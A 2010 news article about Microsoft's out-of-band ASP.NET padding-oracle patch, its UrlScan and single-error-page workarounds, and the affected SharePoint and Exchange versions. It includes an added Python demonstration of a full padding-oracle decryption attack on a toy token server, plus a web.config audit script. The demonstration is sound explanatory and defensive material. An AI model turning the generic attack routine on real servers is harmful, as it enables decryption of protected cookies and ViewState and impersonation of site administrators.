
Microsoft To Release Out-of-Band Patch for ASP.NET Security Flaw

Microsoft plans to release a patch on Tuesday for a security issue associated with ASP.NET systems.

Late on Friday the company published yet another revision of its security advisory on ASP.NET, adding a further step for IT pros applying the workaround. By early Monday afternoon, however, Microsoft had announced a forthcoming patch, to be delivered outside the company's monthly security update cycle. The patch, rated "important," can be expected to arrive on "Tuesday, September 28, 2010 at approximately 10:00 AM PDT," according to a blog post by Dave Forstrom, director of Trustworthy Computing at Microsoft.

Forstrom noted that the patch, described in Microsoft's advance notification bulletin released today, will initially be made available only through the Microsoft Download Center; Microsoft will later distribute it through its other patch channels, including Windows Update, Windows Server Update Services and Automatic Updates. He advised organizations to test the patch before deploying it.

Security advisory 2416728 currently bears a revision date of Sept. 24, 2010, its second revision. The newly added workaround step has IT pros install and configure UrlScan, a free Microsoft add-on for Internet Information Services (IIS) that filters incoming HTTP requests against configurable rules. The current version, UrlScan 3.1, works with IIS 5.1, 6.0 and 7.0 on Windows systems.

Microsoft has described the problem as an information disclosure vulnerability, exploited through a "padding oracle" attack. The "oracle" here is not an Oracle product but the server's own decryption routine: when an attacker submits deliberately corrupted encrypted data, the server's error response reveals whether the decrypted bytes ended in valid padding. Each such answer leaks a little about the protected data, and by sending thousands of modified requests and sorting the responses by error type the attacker can recover the plaintext without ever learning the key. The fix, in short, is to stop the server from telling the attacker which kind of decryption failure occurred.

An attacker can get password information from "cookies, ViewState, URL strings [and] hidden fields" from systems using ASP.NET and change the encrypted information, according to Microsoft blogger Vlad Azarkhin. By changing that information and querying the server, the attacker may gain enough information to impersonate the administrator, gaining access to the server, Azarkhin explained.
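To make the mechanism concrete, here is an added example, not code from Microsoft, the advisory or Azarkhin's post, of a padding-oracle attack against a toy server that issues CBC-encrypted tokens and decrypts whatever the client sends back. The block cipher, the `user=` token format, the server's error strings and the sample token are all constructed for the demonstration; only the padding-error message borrows the wording of .NET's CryptographicException. The same server is run twice: once reporting padding failures distinctly, as a verbose ASP.NET error page does, and once returning one generic error for every failure, which is what the single-error-page workaround achieves.

```python
# Added example, not Microsoft's or Azarkhin's code: a CBC padding-oracle attack on a
# toy token server, with leaky and hardened error handling side by side. The block
# cipher is a Feistel network over HMAC-SHA256 (stdlib only); the attack is cipher-agnostic.
import hashlib
import hmac
import os

BLOCK = 16
PADDING_ERROR = "Padding is invalid and cannot be removed."  # wording of .NET's CryptographicException

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]  # toy keyed permutation, NOT for real use
    for rnd in range(4):
        left, right = right, xor(left, _f(key, right, rnd))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, left, rnd)), left
    return left + right

def unpad(data: bytes) -> bytes:
    n = data[-1]  # PKCS#7: the last byte says how many padding bytes there are
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError(PADDING_ERROR)
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return iv + out  # the IV travels with the ciphertext

def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return b"".join(xor(block_decrypt(key, blocks[i]), blocks[i - 1]) for i in range(1, len(blocks)))

class TokenServer:
    """Issues encrypted tokens (think ViewState or an auth cookie) and decrypts what comes back."""
    def __init__(self, verbose_errors: bool):
        self.key = os.urandom(32)  # secret; never leaves the server
        self.verbose_errors = verbose_errors
    def issue(self, plaintext: bytes) -> bytes:
        n = BLOCK - len(plaintext) % BLOCK  # PKCS#7 padding
        return cbc_encrypt(self.key, os.urandom(BLOCK), plaintext + bytes([n]) * n)
    def handle(self, token: bytes) -> str:
        # Leaky: a distinct message per failure. Hardened: one generic error page for everything.
        try:
            data = unpad(cbc_decrypt(self.key, token))
        except ValueError as exc:
            return str(exc) if self.verbose_errors else "An error occurred."
        if not data.startswith(b"user="):
            return "Bad token." if self.verbose_errors else "An error occurred."
        return "200 OK"

def recover_block(oracle, prev: bytes, target: bytes):
    inter = bytearray(BLOCK)  # D_key(target), learned one byte at a time from the right
    for pos in range(BLOCK - 1, -1, -1):
        pad_len = BLOCK - pos
        hits = []
        for guess in range(256):
            # Bytes already known are set to decrypt to pad_len; the guess must supply the last one.
            forged = bytearray(pos) + bytes([guess]) + bytes(inter[j] ^ pad_len for j in range(pos + 1, BLOCK))
            if oracle(bytes(forged) + target) == PADDING_ERROR:
                continue
            if pos == BLOCK - 1:  # last byte: rule out a chance 02 02 (or longer) padding
                forged[pos - 1] ^= 0xFF
                if oracle(bytes(forged) + target) == PADDING_ERROR:
                    continue
            hits.append(guess)
        if len(hits) != 1:
            return None  # responses do not single out one guess: there is no oracle to exploit
        inter[pos] = hits[0] ^ pad_len
    return xor(bytes(inter), prev)

def recover_token(oracle, token: bytes):
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    plain = b""
    for i in range(1, len(blocks)):
        block = recover_block(oracle, blocks[i - 1], blocks[i])
        if block is None:
            return None
        plain += block
    return unpad(plain)

def demo(verbose_errors: bool):
    server = TokenServer(verbose_errors)
    token = server.issue(b"user=alice; role=user")  # constructed sample token
    return recover_token(server.handle, token)
```

`demo(True)` recovers the whole token after roughly 8,000 requests, none of which required the key; `demo(False)` gives up and returns `None` because every response from the hardened server looks the same. The intermediate values the attack learns are also what lets an attacker forge ciphertext that decrypts to text of their choosing, which is the "change the encrypted information" half of the problem; that step is not shown here.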

The point of running UrlScan is to block "requests that specify the application's error path on the querystring," according to the revised workaround steps in the security advisory. Microsoft's main workaround is to configure ASP.NET to return the same error page for every failure, so that the server's responses no longer reveal which kind of decryption error occurred, according to Azarkhin's latest blog post. He described the workaround as "not enough" but "vital" to apply, and noted that the problem is not specific to Microsoft products but was first discovered in the Java Server Faces Framework.
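As an added example, not taken from the advisory or from Microsoft, the following audits a web.config for the customErrors settings the single-error-page workaround asks for, with a typical per-status-code setup next to the hardened shape. Both configurations are constructed samples; the `redirectMode="ResponseRewrite"` check applies to .NET 3.5 SP1 and later, where that attribute exists.

```python
# Added example, not from Microsoft's advisory: audit a web.config for the customErrors
# settings the single-error-page workaround calls for. Both configurations below are
# constructed samples; the redirectMode check applies to .NET 3.5 SP1 and later.
import xml.etree.ElementTree as ET

WEAK_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <!-- A different page per status code lets a client tell one failure from another. -->
    <customErrors mode="RemoteOnly" defaultRedirect="GenericError.htm">
      <error statusCode="404" redirect="NotFound.aspx" />
      <error statusCode="500" redirect="ServerError.aspx" />
    </customErrors>
  </system.web>
</configuration>
"""

HARDENED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <!-- One page for every error, rewritten in place so that no redirect (and no
         aspxerrorpath query string) tells the client which request failed. -->
    <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/error.aspx" />
  </system.web>
</configuration>
"""

def audit_custom_errors(web_config_xml: str) -> list:
    """Return the ways a web.config falls short of the single-error-page workaround."""
    node = ET.fromstring(web_config_xml).find("./system.web/customErrors")
    if node is None:
        return ["no <customErrors> element: ASP.NET serves its own detailed error pages"]
    findings = []
    if node.get("mode") != "On":
        findings.append("mode is %r; the workaround calls for mode=\"On\"" % node.get("mode"))
    if not node.get("defaultRedirect"):
        findings.append("no defaultRedirect: there is no single page to send every error to")
    if node.get("redirectMode") != "ResponseRewrite":
        # Without ResponseRewrite, ASP.NET redirects to the error page and appends the failing
        # path as ?aspxerrorpath=..., the querystring the advisory's UrlScan step is meant to block.
        findings.append("redirectMode is not ResponseRewrite: errors redirect and expose the error path")
    per_status = [e.get("statusCode") for e in node.findall("error")]
    if per_status:
        findings.append("per-status <error> pages for %s: responses differ by failure type" % ", ".join(per_status))
    return findings
```

Running `audit_custom_errors` over every web.config on a server gives a quick list of applications whose error handling still distinguishes one failure from another; an empty list means the file matches the shape of the workaround, not that the patch can be skipped.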

The revised security advisory specifically states that IT pros who applied the earlier workaround need to go through all of the steps again, so many will likely prefer to wait for Tuesday's patch instead.

The vulnerability also affects other Microsoft products built on ASP.NET, including SharePoint and Exchange. All Exchange versions from Exchange 2003 onward are potentially affected and require the workaround or the patch, according to a Microsoft blog post.

Another Microsoft blog states that the workaround needs to be applied for systems using "SharePoint 2010, SharePoint Foundation 2010, Microsoft Office SharePoint Server 2007, Windows SharePoint Services 3.0 [and] Windows SharePoint Services 2.0." It doesn't need to be applied for systems using "SharePoint Portal Server 2003." 

Microsoft has opened a forum page on the ASP.NET vulnerability to field questions. It also plans to hold a Webinar on Tuesday, Sept. 28, 2010 at 1:00 p.m. Pacific Daylight Time to answer customer questions, and has posted a sign-up page for it.

About the Author

Kurt Mackie is senior news producer for 1105 Media's Converge360 group.
